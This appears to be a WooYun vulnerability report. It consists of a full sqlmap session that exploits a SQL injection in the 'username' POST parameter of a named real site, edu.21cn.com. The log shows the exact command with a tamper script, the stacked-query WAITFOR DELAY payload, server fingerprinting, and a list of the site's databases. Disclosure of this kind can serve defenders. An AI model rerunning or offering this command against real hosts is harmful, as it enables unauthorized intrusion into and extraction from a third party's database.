WooYun.org

root@bt5:/pentest/database/sqlmap# python sqlmap.py -u "http://edu.21cn.com/CountPvUv/" --data "username=gznanhua&fromtype=school" -p username --dbms=mssql --tamper space2comment --thread 4 --dbs
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:13:13
[15:13:13] [INFO] loading tamper script 'space2comment'
[15:13:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: username=gznanhua'; WAITFOR DELAY '0:0:5';--&fromtype=school
---
[15:13:13] [INFO] changes made by tampering scripts are not included in shown payload content(s)
[15:13:13] [INFO] testing Microsoft SQL Server
[15:13:13] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:13:35] [INFO] confirming Microsoft SQL Server
[15:13:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:13:35] [INFO] fetching database names
[15:13:35] [INFO] fetching number of databases
[15:13:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[15:13:35] [INFO] retrieved: 
[15:13:35] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[15:14:15] [INFO] adjusting time delay to 1 second due to good response times
5
[15:14:15] [INFO] retrieved: master
[15:15:51] [INFO] retrieved: mianshou_edu
[15:19:24] [INFO] retrieved: model
[15:20:53] [INFO] retrieved: msdb
[15:21:57] [INFO] retrieved: tempdb
available databases [5]:
[*] master
[*] mianshou_edu
[*] model
[*] msdb
[*] tempdb
[15:23:44] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 308 times
[15:23:44] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/edu.21cn.com'
[*] shutting down at 15:23:44